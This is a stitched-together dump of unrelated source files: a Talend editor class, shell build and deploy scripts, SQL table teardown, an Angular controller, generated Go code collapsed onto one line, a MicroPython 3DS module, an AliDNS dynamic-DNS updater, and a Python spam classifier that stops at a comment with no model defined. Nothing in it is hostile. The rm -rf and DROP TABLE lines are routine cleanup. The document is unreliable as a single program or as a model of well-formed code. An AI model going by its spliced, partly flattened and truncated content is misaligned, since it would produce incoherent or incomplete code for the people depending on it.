        if (withDefaultEditor) {
            designerEditor = new TalendEditor();
        }
    }

    /**
     * Getter for designerEditor.
     *
     * @return the designerEditor
     */
    @Override
    public AbstractTalendEditor getDesignerEditor() {
        return this.designerEditor;
    }

    /**
     * Creates the pages of the multi-page editor.
     */
    @Override
    protected void createPages() {
        super.createPages();
    }

    /**
     * Checks that the input is an {@link IFileEditorInput} or a {@link ProcessEditorInput} before delegating
     * initialization to the superclass.
     */
    @Override
    public void init(final IEditorSite site, final IEditorInput editorInput) throws PartInitException {
        if (!(editorInput instanceof IFileEditorInput) && !(editorInput instanceof ProcessEditorInput)) {
            throw new PartInitException(Messages.getString("MultiPageTalendEditor.InvalidInput")); //$NON-NLS-1$
        }
        super.init(site, editorInput);
    }

    /**
     * Updates the editor tab title from the process name, version and (when the project is under SVN) the
     * current SVN revision. Branding decides whether the version is shown.
     */
    @Override
    public void setName() {
        if (getEditorInput() == null) {
            return;
        }
        super.setName();
        IProcess2 process2 = this.getProcess();
        if (process2 == null) {
            return;
        }
        Property property = process2.getProperty();
        if (property == null) {
            return;
        }
        String label = property.getDisplayName();
        String jobVersion = "0.1"; //$NON-NLS-1$
        // NOTE(review): process2 was already null-checked above; this and the
        // later != null checks are redundant but harmless.
        if (process2 != null) {
            jobVersion = process2.getVersion();
        }
        // if (getActivePage() == 1) {
        ISVNProviderService service = null;
        if (PluginChecker.isSVNProviderPluginLoaded()) {
            service = (ISVNProviderService) GlobalServiceRegister.getDefault().getService(ISVNProviderService.class);
            // Only refresh the revision suffix when something changed.
            if (revisionChanged && service.isProjectInSvnMode()) {
                revisionNumStr = service.getCurrentSVNRevision(process2);
                revisionChanged = false;
                if (revisionNumStr != null) {
                    revisionNumStr = ".r" + revisionNumStr; //$NON-NLS-1$
                }
            }
        }
        // Message key differs for joblets vs. regular jobs.
        String title = "MultiPageTalendEditor.Job";//$NON-NLS-1$
        if (process2 != null) {
            Item item = process2.getProperty().getItem();
            if (item instanceof JobletProcessItem) {
                title = "MultiPageTalendEditor.Joblet";//$NON-NLS-1$
            }
        }
        IBrandingService brandingService = (IBrandingService) GlobalServiceRegister.getDefault().getService(
                IBrandingService.class);
        boolean allowVerchange = brandingService.getBrandingConfiguration().isAllowChengeVersion();
        if (allowVerchange) {
            if (revisionNumStr != null) {
                setPartName(Messages.getString(title, label, jobVersion) + revisionNumStr);
            } else {
                setPartName(Messages.getString(title, label, jobVersion));
            }
        } else {
            if (revisionNumStr != null) {
                setPartName(Messages.getString(title, label, "") + revisionNumStr);//$NON-NLS-1$
            } else {
                setPartName(Messages.getString(title, label, "")); //$NON-NLS-1$
            }
        }
    }

    /*
     * (non-Javadoc)
     *
     * @see org.talend.designer.core.ui.AbstractMultiPageTalendEditor#getEditorId()
     */
    @Override
    public String getEditorId() {
        return ID;
    }

    /**
     * Saves the editor unless a contained joblet is still dirty, then refreshes the tab title.
     */
    @Override
    public void doSave(IProgressMonitor monitor) {
        if (haveDirtyJoblet()) {
            return;
        }
        super.doSave(monitor);
        this.setName();
    }
}
#!/usr/bin/env bash

# Create the standard set of personal directories under $HOME.
# Depends on `mkd` (mkdir with feedback) provided by ../utils.sh.

cd "$(dirname "${BASH_SOURCE[0]}")" \
    && . "../utils.sh"

# shellcheck disable=SC2034
# NOTE(review): srcdir is unused in this script; kept in case sourced
# helpers rely on it — confirm and remove if not.
srcdir="$(cd .. && pwd)"

# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

create_directories() {

    echo ""

    # Previously the array and loop variable were globals (DIRECTORIES, i)
    # that leaked out of the function; both are local now.
    local -ra dirs=(
        "$HOME/Projects"
        "$HOME/.config"
        "$HOME/.local/share/torrents"
        "$HOME/.local/.configs"
    )

    local dir
    for dir in "${dirs[@]}"; do
        mkd "$dir"
    done

}

# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

main() {
    create_directories
}

main
-- Tear down all business-process (b_bp_*) tables, ignoring missing ones.
DROP TABLE IF EXISTS b_bp_workflow_template;
DROP TABLE IF EXISTS b_bp_workflow_state;
DROP TABLE IF EXISTS b_bp_workflow_permissions;
DROP TABLE IF EXISTS b_bp_workflow_instance;
DROP TABLE IF EXISTS b_bp_tracking;
DROP TABLE IF EXISTS b_bp_task;
DROP TABLE IF EXISTS b_bp_task_user;
DROP TABLE IF EXISTS b_bp_history;
// repo: filipecorrea/read-and-rank
// Q&A controller: posts the user's question to the server-side
// Retrieve-and-Rank proxy and exposes the ranked documents (or the error)
// on the scope for the view.
angular.module('read-and-learn').controller('qaController', function ($scope, $rootScope, $http) {
  $scope.documents = null;
  $scope.error = null;

  // NOTE(review): hard-coded service identifiers — presumably these should
  // come from configuration; confirm before pointing at another cluster.
  var cluster_id = 'scf9b13b48_1835_48cf_ac7f_143b7bb8712b';
  var config_name = 'example-config';
  var collection_name = 'example-collection3';

  // Invoked by the view when the question input changes; clears previous
  // results, then fetches fresh ones.
  $scope.textChanged = function(event) {
    if ($scope.question) {
      $scope.documents = null;
      $scope.error = null;
      // TODO Set timeout to show message if no result is found
      // Call API to retrieve documents
      $http({
        method: 'POST',
        url: '/api/retrieve-and-rank/' + cluster_id + '/' + config_name + '/' + collection_name + '/documents',
        data: { 'query': $scope.question }
      }).then(function successCallback(response) {
        $scope.documents = response.data.docs;
      }, function errorCallback(response) {
        $scope.error = response;
      });
    }
  };
});
#!/bin/bash

# MIT License
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE

# Build the frameworkbarrier binary distribution into dist/frameworkbarrier.
# Fix over previous version: all path expansions are quoted and
# ${BASH_SOURCE[0]} is indexed, so the script works from paths containing
# spaces and under `set -o nounset`.

set -o errexit
set -o nounset
set -o pipefail

BASH_DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
# Ensure ${PROJECT_DIR} is ${GOPATH}/src/github.com/microsoft/frameworkcontroller
PROJECT_DIR="${BASH_DIR}/../.."
DIST_DIR="${PROJECT_DIR}/dist/frameworkbarrier"

cd "${PROJECT_DIR}"
rm -rf "${DIST_DIR}"
mkdir -p "${DIST_DIR}"

# Globs below are intentionally unquoted: they must expand to file lists.
go build -o "${DIST_DIR}/frameworkbarrier" cmd/frameworkbarrier/*
chmod a+x "${DIST_DIR}/frameworkbarrier"
cp -r bin/frameworkbarrier/* "${DIST_DIR}"

echo "Succeeded to build binary distribution into ${DIST_DIR}:"
cd "${DIST_DIR}" && ls -lR .
<reponame>blushft/strana // Code generated by entc, DO NOT EDIT. package event import ( "fmt" ) const ( // Label holds the string label denoting the event type in the database. Label = "event" // FieldID holds the string denoting the id field in the database. FieldID = "id" // FieldTrackingID holds the string denoting the tracking_id field in the database. FieldTrackingID = "tracking_id" // FieldEvent holds the string denoting the event field in the database. FieldEvent = "event" // FieldNonInteractive holds the string denoting the non_interactive field in the database. FieldNonInteractive = "non_interactive" // FieldChannel holds the string denoting the channel field in the database. FieldChannel = "channel" // FieldPlatform holds the string denoting the platform field in the database. FieldPlatform = "platform" // FieldProperties holds the string denoting the properties field in the database. FieldProperties = "properties" // FieldTimestamp holds the string denoting the timestamp field in the database. FieldTimestamp = "timestamp" // EdgeAction holds the string denoting the action edge name in mutations. EdgeAction = "action" // EdgeAlias holds the string denoting the alias edge name in mutations. EdgeAlias = "alias" // EdgeApp holds the string denoting the app edge name in mutations. EdgeApp = "app" // EdgeBrowser holds the string denoting the browser edge name in mutations. EdgeBrowser = "browser" // EdgeCampaign holds the string denoting the campaign edge name in mutations. EdgeCampaign = "campaign" // EdgeConnectivity holds the string denoting the connectivity edge name in mutations. EdgeConnectivity = "connectivity" // EdgeDevice holds the string denoting the device edge name in mutations. EdgeDevice = "device" // EdgeExtra holds the string denoting the extra edge name in mutations. EdgeExtra = "extra" // EdgeGroup holds the string denoting the group edge name in mutations. 
EdgeGroup = "group" // EdgeLibrary holds the string denoting the library edge name in mutations. EdgeLibrary = "library" // EdgeLocation holds the string denoting the location edge name in mutations. EdgeLocation = "location" // EdgeNetwork holds the string denoting the network edge name in mutations. EdgeNetwork = "network" // EdgeOs holds the string denoting the os edge name in mutations. EdgeOs = "os" // EdgePage holds the string denoting the page edge name in mutations. EdgePage = "page" // EdgeReferrer holds the string denoting the referrer edge name in mutations. EdgeReferrer = "referrer" // EdgeScreen holds the string denoting the screen edge name in mutations. EdgeScreen = "screen" // EdgeSession holds the string denoting the session edge name in mutations. EdgeSession = "session" // EdgeTiming holds the string denoting the timing edge name in mutations. EdgeTiming = "timing" // EdgeViewport holds the string denoting the viewport edge name in mutations. EdgeViewport = "viewport" // EdgeUser holds the string denoting the user edge name in mutations. EdgeUser = "user" // Table holds the table name of the event in the database. Table = "events" // ActionTable is the table the holds the action relation/edge. ActionTable = "actions" // ActionInverseTable is the table name for the Action entity. // It exists in this package in order to avoid circular dependency with the "action" package. ActionInverseTable = "actions" // ActionColumn is the table column denoting the action relation/edge. ActionColumn = "event_action" // AliasTable is the table the holds the alias relation/edge. AliasTable = "alias" // AliasInverseTable is the table name for the Alias entity. // It exists in this package in order to avoid circular dependency with the "alias" package. AliasInverseTable = "alias" // AliasColumn is the table column denoting the alias relation/edge. AliasColumn = "event_alias" // AppTable is the table the holds the app relation/edge. 
AppTable = "events" // AppInverseTable is the table name for the App entity. // It exists in this package in order to avoid circular dependency with the "app" package. AppInverseTable = "apps" // AppColumn is the table column denoting the app relation/edge. AppColumn = "event_app" // BrowserTable is the table the holds the browser relation/edge. BrowserTable = "browsers" // BrowserInverseTable is the table name for the Browser entity. // It exists in this package in order to avoid circular dependency with the "browser" package. BrowserInverseTable = "browsers" // BrowserColumn is the table column denoting the browser relation/edge. BrowserColumn = "event_browser" // CampaignTable is the table the holds the campaign relation/edge. CampaignTable = "events" // CampaignInverseTable is the table name for the Campaign entity. // It exists in this package in order to avoid circular dependency with the "campaign" package. CampaignInverseTable = "campaigns" // CampaignColumn is the table column denoting the campaign relation/edge. CampaignColumn = "event_campaign" // ConnectivityTable is the table the holds the connectivity relation/edge. ConnectivityTable = "connectivities" // ConnectivityInverseTable is the table name for the Connectivity entity. // It exists in this package in order to avoid circular dependency with the "connectivity" package. ConnectivityInverseTable = "connectivities" // ConnectivityColumn is the table column denoting the connectivity relation/edge. ConnectivityColumn = "event_connectivity" // DeviceTable is the table the holds the device relation/edge. DeviceTable = "events" // DeviceInverseTable is the table name for the Device entity. // It exists in this package in order to avoid circular dependency with the "device" package. DeviceInverseTable = "devices" // DeviceColumn is the table column denoting the device relation/edge. DeviceColumn = "event_device" // ExtraTable is the table the holds the extra relation/edge. 
ExtraTable = "events" // ExtraInverseTable is the table name for the Extra entity. // It exists in this package in order to avoid circular dependency with the "extra" package. ExtraInverseTable = "extras" // ExtraColumn is the table column denoting the extra relation/edge. ExtraColumn = "event_extra" // GroupTable is the table the holds the group relation/edge. GroupTable = "events" // GroupInverseTable is the table name for the Group entity. // It exists in this package in order to avoid circular dependency with the "group" package. GroupInverseTable = "groups" // GroupColumn is the table column denoting the group relation/edge. GroupColumn = "event_group" // LibraryTable is the table the holds the library relation/edge. LibraryTable = "events" // LibraryInverseTable is the table name for the Library entity. // It exists in this package in order to avoid circular dependency with the "library" package. LibraryInverseTable = "libraries" // LibraryColumn is the table column denoting the library relation/edge. LibraryColumn = "event_library" // LocationTable is the table the holds the location relation/edge. LocationTable = "events" // LocationInverseTable is the table name for the Location entity. // It exists in this package in order to avoid circular dependency with the "location" package. LocationInverseTable = "locations" // LocationColumn is the table column denoting the location relation/edge. LocationColumn = "event_location" // NetworkTable is the table the holds the network relation/edge. NetworkTable = "events" // NetworkInverseTable is the table name for the Network entity. // It exists in this package in order to avoid circular dependency with the "network" package. NetworkInverseTable = "networks" // NetworkColumn is the table column denoting the network relation/edge. NetworkColumn = "event_network" // OsTable is the table the holds the os relation/edge. OsTable = "events" // OsInverseTable is the table name for the OSContext entity. 
// It exists in this package in order to avoid circular dependency with the "oscontext" package. OsInverseTable = "os" // OsColumn is the table column denoting the os relation/edge. OsColumn = "event_os" // PageTable is the table the holds the page relation/edge. PageTable = "events" // PageInverseTable is the table name for the Page entity. // It exists in this package in order to avoid circular dependency with the "page" package. PageInverseTable = "pages" // PageColumn is the table column denoting the page relation/edge. PageColumn = "event_page" // ReferrerTable is the table the holds the referrer relation/edge. ReferrerTable = "events" // ReferrerInverseTable is the table name for the Referrer entity. // It exists in this package in order to avoid circular dependency with the "referrer" package. ReferrerInverseTable = "referrers" // ReferrerColumn is the table column denoting the referrer relation/edge. ReferrerColumn = "event_referrer" // ScreenTable is the table the holds the screen relation/edge. ScreenTable = "events" // ScreenInverseTable is the table name for the Screen entity. // It exists in this package in order to avoid circular dependency with the "screen" package. ScreenInverseTable = "screens" // ScreenColumn is the table column denoting the screen relation/edge. ScreenColumn = "event_screen" // SessionTable is the table the holds the session relation/edge. SessionTable = "events" // SessionInverseTable is the table name for the Session entity. // It exists in this package in order to avoid circular dependency with the "session" package. SessionInverseTable = "sessions" // SessionColumn is the table column denoting the session relation/edge. SessionColumn = "event_session" // TimingTable is the table the holds the timing relation/edge. TimingTable = "events" // TimingInverseTable is the table name for the Timing entity. // It exists in this package in order to avoid circular dependency with the "timing" package. 
TimingInverseTable = "timings" // TimingColumn is the table column denoting the timing relation/edge. TimingColumn = "event_timing" // ViewportTable is the table the holds the viewport relation/edge. ViewportTable = "events" // ViewportInverseTable is the table name for the Viewport entity. // It exists in this package in order to avoid circular dependency with the "viewport" package. ViewportInverseTable = "viewports" // ViewportColumn is the table column denoting the viewport relation/edge. ViewportColumn = "event_viewport" // UserTable is the table the holds the user relation/edge. UserTable = "events" // UserInverseTable is the table name for the User entity. // It exists in this package in order to avoid circular dependency with the "user" package. UserInverseTable = "users" // UserColumn is the table column denoting the user relation/edge. UserColumn = "event_user" ) // Columns holds all SQL columns for event fields. var Columns = []string{ FieldID, FieldTrackingID, FieldEvent, FieldNonInteractive, FieldChannel, FieldPlatform, FieldProperties, FieldTimestamp, } // ForeignKeys holds the SQL foreign-keys that are owned by the Event type. var ForeignKeys = []string{ "event_app", "event_campaign", "event_device", "event_extra", "event_group", "event_library", "event_location", "event_network", "event_os", "event_page", "event_referrer", "event_screen", "event_session", "event_timing", "event_viewport", "event_user", } // Event defines the type for the event enum field. type Event string // Event values. const ( EventAction Event = "action" EventAlias Event = "alias" EventGroup Event = "group" EventIdentify Event = "identify" EventPageview Event = "pageview" EventScreenview Event = "screenview" EventSession Event = "session" EventTiming Event = "timing" EventTransaction Event = "transaction" ) func (e Event) String() string { return string(e) } // EventValidator is a validator for the "event" field enum values. It is called by the builders before save. 
func EventValidator(e Event) error { switch e { case EventAction, EventAlias, EventGroup, EventIdentify, EventPageview, EventScreenview, EventSession, EventTiming, EventTransaction: return nil default: return fmt.Errorf("event: invalid enum value for event field: %q", e) } }
package mainclient.fieldStaticAndOverridesStatic;

import main.fieldStaticAndOverridesStatic.FieldStaticAndOverridesStatic;

// NOTE(review): looks like a static-analysis/call-graph test fixture — the
// class name encodes the scenario ("field, static, overrides static");
// confirm against the surrounding test suite.
public class FieldStaticAndOverridesStaticFA {

    /**
     * Reads the static field {@code FieldStaticAndOverridesStatic.fieldStatic}
     * and returns its current value.
     */
    public int accessFieldFromSubtype() {
        return FieldStaticAndOverridesStatic.fieldStatic;
    }
}
#include <3ds.h>

#include "py/runtime.h"

#include "../init_helper.h"

// Defines a const MicroPython function object `mod_citrus_qtm_<name>_obj`
// wrapping the C function `mod_citrus_qtm_<name>` taking <args> arguments.
#define METHOD_OBJ_N(__args, __n) \
    STATIC MP_DEFINE_CONST_FUN_OBJ_##__args(mod_citrus_qtm_##__n##_obj, mod_citrus_qtm_##__n)

// Globals-table entry pairing the QSTR `<name>` with its function object.
#define LOCAL_METHOD(__n) \
    {MP_OBJ_NEW_QSTR(MP_QSTR_##__n), (mp_obj_t) &mod_citrus_qtm_##__n##_obj}

// HeadTracking class, defined in a sibling translation unit.
extern const mp_obj_type_t mod_citrus_qtm_HeadTracking_type;

// Local init flag so init/exit are idempotent (see ../init_helper.h).
static int _mod_citrus_qtm_is_init = 0;

// qtm.init() -> int: initialize the QTM service and return qtmInit()'s
// result code. Returns early (via INIT_ONCE) if already initialized.
STATIC mp_obj_t mod_citrus_qtm_init(void) {
    INIT_ONCE(_mod_citrus_qtm_is_init);

    return mp_obj_new_int(qtmInit());
}

// qtm.exit() -> None: shut the QTM service down. Returns early (via
// EXIT_ONCE) if the module was never initialized.
// NOTE(review): not STATIC — presumably referenced from another file.
mp_obj_t mod_citrus_qtm_exit(void) {
    EXIT_ONCE(_mod_citrus_qtm_is_init);

    qtmExit();
    return mp_const_none;
}

// qtm.check_initialized() -> bool: asks the service itself whether it is
// ready (distinct from the local _mod_citrus_qtm_is_init flag).
STATIC mp_obj_t mod_citrus_qtm_check_initialized(void) {
    return mp_obj_new_bool(qtmCheckInitialized());
}

METHOD_OBJ_N(0, init);
METHOD_OBJ_N(0, exit);
METHOD_OBJ_N(0, check_initialized);

// Module globals table: module name, exported classes and functions.
STATIC const mp_rom_map_elem_t mp_module_citrus_qtm_globals_table[] = {
        // Package Info
        {MP_ROM_QSTR(MP_QSTR___name__), MP_ROM_QSTR(MP_QSTR_qtm)},

        // Classes
        {MP_ROM_QSTR(MP_QSTR_HeadTracking), MP_ROM_PTR(&mod_citrus_qtm_HeadTracking_type)},

        // Functions
        LOCAL_METHOD(init),
        LOCAL_METHOD(exit),
        LOCAL_METHOD(check_initialized),
};
STATIC MP_DEFINE_CONST_DICT(mp_module_citrus_qtm_globals, mp_module_citrus_qtm_globals_table);

// Module object registered with the MicroPython runtime as `qtm`.
const mp_obj_module_t mp_module_citrus_qtm = {
        .base = {&mp_type_module},
        .name = MP_QSTR_qtm,
        .globals = (mp_obj_dict_t *) &mp_module_citrus_qtm_globals,
};
#!/usr/bin/env bash
# Redeploy the jobtrakr server: fetch a fresh clone, install dependencies,
# free port 3000, and start the server in the background.
set -euo pipefail

# Start from a clean checkout.
rm -rf ~/server
cd ~/

# Fix: the original prefixed the next two commands with `echo`, which only
# printed them — the clone and install never actually ran, so the freshly
# deleted ~/server was never recreated.
git clone "https://github.com/kevinrlewis/jobtrakr.git" server
cd ~/server
npm install

# Kill whatever currently holds port 3000; ignore failure when it is free.
fuser -k 3000/tcp || true

# Launch the server detached from this script.
node server.js &

ls -l ~/server
#!/usr/bin/env bash
# Dynamic-DNS client for the AliDNS HTTP API: when the host's public IP
# differs from the DNS record, sign and send an UpdateDomainRecord request.
#
# Fix: the shebang was "#!/bin/sh", but the script depends on bash-only
# features (substring expansion "${str:pos:1}", "==" inside [ ]).
#By h46incon
#Dependences: bind-dig, curl, openssl-util, tr, sort

## ----- Setting -----
AccessKeyId="testid"
AccessKeySec="testsecret"
DomainRecordId="00000"
# DomainRR, use "@" to set top level domain
DomainRR="www"
DomainName="example.com"
DomainType="A"

# DNS Server for check current IP of the record
# Preferred setting is your domain name service provider
# Leave it blank if using the default DNS Server
DNSServer="dns9.hichina.com"

# The server address of ALi API
ALiServerAddr="alidns.aliyuncs.com"

# A url provided by a third-party to echo the public IP of host
MyIPEchoUrl="http://members.3322.org/dyndns/getip"
# MyIPEchoUrl="http://icanhazip.com"

# the generation of the random nonce can be modified here
#((rand_num=${RANDOM} * ${RANDOM} * ${RANDOM}))
rand_num=$(openssl rand -hex 16)

## ----- Log level -----
_DEBUG_=true
_LOG_=true
_ERR_=true

## ===== private =====
## ----- global var -----
# Request params are kept in dynamically named globals (an ordered map):
#   g_pkey_$i    # param key at insertion index i
#   g_pval_$key  # param value for key
g_pn=0        # number of params
_func_ret=""  # "return value" channel for functions

## ----- Base Util -----
_debug() { ${_DEBUG_} && echo "> $*"; }
_log()   { ${_LOG_} && echo "* $*"; }
_err()   { ${_ERR_} && echo "! $*"; }

reset_func_ret()
{
	_func_ret=""
}

## ----- params -----
# Append one request parameter.
# @Param1: Key
# @Param2: Value
put_param()
{
	eval g_pkey_${g_pn}=$1
	eval g_pval_$1=$2
	g_pn=$((g_pn + 1))
}

# This function will init all public params EXCLUDE "Signature"
put_params_public()
{
	put_param "Format" "JSON"
	put_param "Version" "2015-01-09"
	put_param "AccessKeyId" "${AccessKeyId}"
	put_param "SignatureMethod" "HMAC-SHA1"
	put_param "SignatureVersion" "1.0"

	# time stamp (ISO-8601 in UTC, as the API requires)
	local time_utc=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
	_debug time_stamp: ${time_utc}
	put_param "Timestamp" "${time_utc}"

	# random anti-replay nonce
	_debug rand_num: ${rand_num}
	put_param "SignatureNonce" "${rand_num}"
}

# @Param1: New IP address
put_params_UpdateDomainRecord()
{
	put_param "Action" "UpdateDomainRecord"
	put_param "RR" "${DomainRR}"
	put_param "RecordId" "${DomainRecordId}"
	put_param "Type" "${DomainType}"
	put_param "Value" "${1}"
}

put_params_DescribeDomainRecords()
{
	put_param "Action" "DescribeDomainRecords"
	put_param "DomainName" ${DomainName}
}

# URL-encode every key/value pair and join with '&' into _func_ret.
pack_params()
{
	reset_func_ret
	local ret=""
	local key key_enc val val_enc
	local i=0
	while [ $i -lt ${g_pn} ]
	do
		eval key="\$g_pkey_${i}"
		eval val="\$g_pval_${key}"
		rawurl_encode "${key}"
		key_enc=${_func_ret}
		rawurl_encode "${val}"
		val_enc=${_func_ret}
		ret="${ret}${key_enc}=${val_enc}&"
		# Fix: "i=$((++i))" relied on a non-standard pre-increment quirk;
		# plain addition is unambiguous and portable.
		i=$((i + 1))
	done
	#delete last "&"
	_func_ret=${ret%"&"}
}

# ----- Other utils -----
# Ask a third-party echo service for this host's public IP.
get_my_ip()
{
	reset_func_ret
	local my_ip=$(curl ${MyIPEchoUrl} --silent --connect-timeout 10)
	_func_ret=${my_ip}
}

# Resolve the record's current value via dig into _func_ret.
get_domain_ip()
{
	reset_func_ret
	local full_domain=""
	if [ -z "${DomainRR}" ] || [ "${DomainRR}" == "@" ]; then
		full_domain=${DomainName}
	else
		full_domain=${DomainRR}.${DomainName}
	fi

	# Fix: the old code always ran `dig "$ns_param" ...`; with DNSServer
	# blank that passed a quoted empty argument, which dig treats as a
	# (bogus) name to look up. Only pass @server when one is configured.
	if [ -n "${DNSServer}" ]; then
		_func_ret=$(dig "@${DNSServer}" "${full_domain}" +short)
	else
		_func_ret=$(dig "${full_domain}" +short)
	fi
}

# RFC 3986 percent-encoding: unreserved characters pass through untouched,
# everything else becomes %XX.
# @Param1: Raw url to be encoded
rawurl_encode()
{
	reset_func_ret
	local string="${1}"
	local strlen=${#string}
	local encoded=""
	local pos c o

	pos=0
	while [ ${pos} -lt ${strlen} ]
	do
		c=${string:$pos:1}
		case "$c" in
			[-_.~a-zA-Z0-9] ) o="${c}" ;;
			* ) o=$(printf "%%%02X" "'$c")
		esac
		encoded="${encoded}${o}"
		pos=$((pos + 1))
	done
	_func_ret="${encoded}"
}

# Build the signature per Aliyun's "Signature Method": sort keys byte-wise,
# build the canonical query string, HMAC-SHA1 with "<secret>&", base64.
calc_signature()
{
	reset_func_ret
	local sorted_key=$(
		i=0
		while [ $i -lt ${g_pn} ]
		do
			eval key="\$g_pkey_$i"
			echo "${key}"
			i=$((i + 1))
		done | LC_COLLATE=C sort
	)

	local query_str=""
	for key in ${sorted_key}
	do
		eval val="\$g_pval_${key}"
		rawurl_encode "${key}"
		key_enc=${_func_ret}
		rawurl_encode "${val}"
		val_enc=${_func_ret}
		query_str="${query_str}${key_enc}=${val_enc}&"
	done
	query_str=${query_str%'&'}
	_debug Query String: ${query_str}

	# encode once more to build the "string to sign"
	rawurl_encode "${query_str}"
	local encoded_str=${_func_ret}
	local str_to_signed="GET&%2F&"${encoded_str}
	_debug String to Signed: ${str_to_signed}

	local key_sign="${AccessKeySec}&"
	_func_ret=$(/bin/echo -n ${str_to_signed} | openssl dgst -binary -sha1 -hmac ${key_sign} | openssl enc -base64)
}

# Sign the accumulated params and GET the request; echoes the HTTP response
# with "HttpCode:<status>" appended.
send_request()
{
	# put signature
	calc_signature
	local signature=${_func_ret}
	put_param "Signature" "${signature}"

	# pack all params
	pack_params
	local packed_params=${_func_ret}

	local req_url="${ALiServerAddr}/?${packed_params}"
	_debug Request addr: ${req_url}
	# NOTE(review): "-3" forces SSLv3, which modern servers reject; it is
	# inert here because the URL carries no https scheme — confirm and
	# consider https without -3.
	local respond=$(curl -3 ${req_url} --silent --connect-timeout 10 -w "HttpCode:%{http_code}")
	echo ${respond}
}

describe_record()
{
	put_params_public
	put_params_DescribeDomainRecords
	send_request
}

update_record()
{
	# get ip
	get_my_ip
	local my_ip=${_func_ret}

	# Check if need update
	_debug My IP: ${my_ip}
	if [ -z "${my_ip}" ]; then
		_err Could not get my ip, exitting...
		exit
	fi

	get_domain_ip
	local domain_ip=${_func_ret}
	_debug Current Domain IP: ${domain_ip}
	if [ "${my_ip}" == "${domain_ip}" ]; then
		_log Need not to update, current IP: ${my_ip}
		exit
	fi

	# init params
	put_params_public
	put_params_UpdateDomainRecord ${my_ip}
	send_request
}

main()
{
	describe_record
	#update_record
}

main
// Parse any CSS color string (named color, rgb(), hex, ...) into an RGBA
// tuple by letting a canvas 2D context normalize it.
// NOTE(review): fully-opaque colors serialize to "#rrggbb"; translucent
// colors come back as "rgba(...)", which this does not handle — confirm
// callers only pass opaque colors.
export function parseColor(str) {
  const ctx = document.createElement("canvas").getContext("2d");
  ctx.fillStyle = str;
  return hexStringToColor(ctx.fillStyle);
}

// Convert "#rrggbb" or "#rrggbbaa" into [r, g, b, a], each 0-255.
export function hexStringToColor(hexString) {
  const hex = hexString.substr(1);
  return [
    parseInt(hex.substring(0, 2), 16),
    parseInt(hex.substring(2, 4), 16),
    parseInt(hex.substring(4, 6), 16),
    // Fix: a 6-digit hex string has no alpha digits and parseInt("") is
    // NaN; default the alpha channel to fully opaque instead.
    hex.length >= 8 ? parseInt(hex.substring(6, 8), 16) : 255,
  ];
}
package org.softuni.residentevil.domain.validation.annotations.composite.virus;

import javax.validation.Constraint;
import javax.validation.Payload;
import javax.validation.constraints.NotBlank;
import javax.validation.constraints.Size;
import java.lang.annotation.Documented;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;

import static java.lang.annotation.ElementType.*;
import static java.lang.annotation.RetentionPolicy.RUNTIME;

/**
 * Description – Cannot be empty, should be between 5 and 100 symbols.<br>
 * Represented as Text in the database
 */
@NotBlank(message = "{virus.description.blank}")
@Size(message = "{virus.description.length}",
        min = ValidVirusDescription.MIN_LENGTH,
        max = ValidVirusDescription.MAX_LENGTH)
@Target({METHOD, FIELD, ANNOTATION_TYPE, CONSTRUCTOR, PARAMETER})
@Retention(RUNTIME)
// Composite constraint: validation comes from the stacked @NotBlank/@Size
// above, so no dedicated validator class is needed.
@Constraint(validatedBy = {})
@Documented
public @interface ValidVirusDescription {

    // Bounds referenced by the @Size annotation above.
    int MIN_LENGTH = 5;
    int MAX_LENGTH = 100;

    // Standard Bean Validation attributes (message keys come from the
    // stacked constraints, so the default here is unused).
    String message() default "";

    Class<?>[] groups() default {};

    Class<? extends Payload>[] payload() default {};
}
#!/bin/sh
# Out-of-source CMake build: configure and compile into ./build.
# Fix: the original shebang was "#/bin/sh" (missing '!'), so the kernel
# never recognized the interpreter line.
set -e

# -p: don't fail when the build directory already exists (re-runs).
mkdir -p build
cd build
cmake ..
make
<reponame>plotter/platform2 import { inject } from 'aurelia-framework'; import { StateDirectory } from '../platform/state/state-directory'; import { StateRepository } from '../platform/state/state-repository'; import { PakDirectory } from '../platform/pak/pak-directory'; @inject(StateDirectory) export class NewSession { public hostId: string; public stateRepository: StateRepository; public pakDirectory: PakDirectory; constructor(private stateDirectory: StateDirectory) {} public activate(params) { let that = this; this.hostId = params.hostId; this.stateRepository = this.stateDirectory.getStateRepository(this.hostId); this.stateRepository.getPakDirectory() .then(pakDirectory => { that.pakDirectory = pakDirectory; that.pakDirectory.pakRepositories.forEach(pakRepo => { pakRepo.getPakList(); }); }); } }
# Train and evaluate a dense-network spam classifier on spam_emails.csv.
# import necessary libraries
import tensorflow as tf
import pandas as pd

# read in data
data = pd.read_csv('spam_emails.csv')

# create features and labels (last column is the label)
X = data.iloc[:, :-1]
y = data.iloc[:, -1]

# Fix: the original called train_test_split without ever importing it
# (it lives in sklearn.model_selection), so the script raised NameError.
# Do an equivalent reproducible 80/20 split with pandas instead: shuffle
# with a fixed seed, then slice.
_shuffled = data.sample(frac=1, random_state=42)
_split_at = int(len(_shuffled) * 0.8)
X_train = _shuffled.iloc[:_split_at, :-1]
X_test = _shuffled.iloc[_split_at:, :-1]
y_train = _shuffled.iloc[:_split_at, -1]
y_test = _shuffled.iloc[_split_at:, -1]

# get the shape of the inputs
n_features = X_train.shape[1]
n_classes = len(y.unique())

# create the model: two hidden ReLU layers, softmax output over the classes
